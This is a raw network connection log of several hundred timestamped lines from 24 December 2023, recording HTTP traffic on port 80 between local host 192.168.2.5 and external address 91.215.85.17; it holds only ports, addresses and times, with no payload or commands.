Dec 24, 2023 10:44:27.014156103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014205933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014250040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014319897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014374018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014399052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014417887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014441967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014453888 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014491081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014522076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014530897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014559984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014586926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014626026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014651060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014688969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014705896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014750004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014765978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014827013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014870882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.014873981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014926910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.014969110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015146017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015182972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015249968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015264034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015304089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015367031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015461922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015475988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015501976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015512943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015533924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015569925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015577078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015613079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015642881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015682936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015758991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015798092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015805960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015846014 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015870094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015913010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.015950918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.015991926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.016020060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016052008 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.016077995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016123056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016161919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.016186953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016239882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016278982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.016315937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016355038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.016515970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016546965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016587019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.016666889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016761065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016791105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.016805887 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.016830921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.016854048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017146111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017187119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.017227888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017246962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017287970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.017348051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017388105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017388105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.017416000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017455101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.017481089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017532110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017576933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.017616987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017652988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.017661095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017741919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017779112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.017815113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017898083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.017937899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.017962933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018002033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018018961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018091917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018131018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018189907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018328905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018368959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018388033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018421888 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018481970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018589973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018629074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018647909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018695116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018734932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018760920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018774033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018795967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018822908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018847942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018887997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018889904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018927097 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018954039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.018990040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.018997908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019042969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019062042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019113064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019140005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019180059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019243956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019284010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019397020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019437075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019459963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019476891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019493103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019511938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019572020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019629002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019666910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019679070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019773006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019814968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.019928932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.019968987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.020062923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020140886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020181894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.020209074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020334959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020378113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.020415068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020454884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.020539999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020612001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020652056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.020688057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020823956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020868063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.020905972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.020945072 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.020961046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021249056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021289110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.021349907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021465063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021498919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021505117 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.021534920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.021568060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021646976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021687984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.021815062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021987915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.021998882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022027016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.022042990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.022080898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022193909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022239923 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.022294044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022336960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022381067 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.022398949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022442102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.022521019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022608042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022650957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.022687912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022829056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022865057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.022929907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.022975922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.022995949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023053885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023092985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.023129940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023458958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023502111 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.023550987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023597002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.023610115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023667097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023706913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.023745060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023777962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023818016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.023879051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.023921013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.023976088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024034023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024079084 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.024104118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024161100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024198055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024202108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.024231911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.024333000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024437904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024478912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.024554014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024749041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024792910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024799109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.024828911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.024873018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024951935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.024997950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025017023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025085926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025152922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025365114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025408983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025418043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025465012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025505066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025537014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025551081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025587082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025650024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025665998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025691986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025717020 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025752068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025764942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025789976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025801897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.025836945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025926113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025964022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.025966883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.026087046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026132107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.026211023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026251078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.026418924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026432991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026470900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.026508093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026591063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026633024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.026717901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026756048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.026815891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026873112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026915073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.026940107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.026990891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027031898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027075052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027110100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027113914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027172089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027209997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027271986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027287960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027328968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027383089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027422905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027475119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027509928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027554035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027576923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027661085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027700901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027738094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027771950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027795076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027878046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.027916908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.027971029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028070927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028111935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.028176069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028189898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028213978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.028239012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.028268099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028289080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028327942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.028390884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028522968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028563976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.028589010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028630018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.028655052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028778076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028824091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.028884888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028897047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.028934002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.028959990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029000044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029025078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029088974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029122114 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029145002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029191971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029232025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029292107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029334068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029385090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029409885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029450893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029510021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029539108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029583931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029587030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029623985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029649019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029717922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029757023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029788971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029838085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029876947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029886007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029930115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.029943943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.029974937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030014992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030040026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030085087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030134916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030169964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030205011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:27.030227900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030278921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:27.030316114 CET	49716	80	192.168.2.5	91.215.85.17
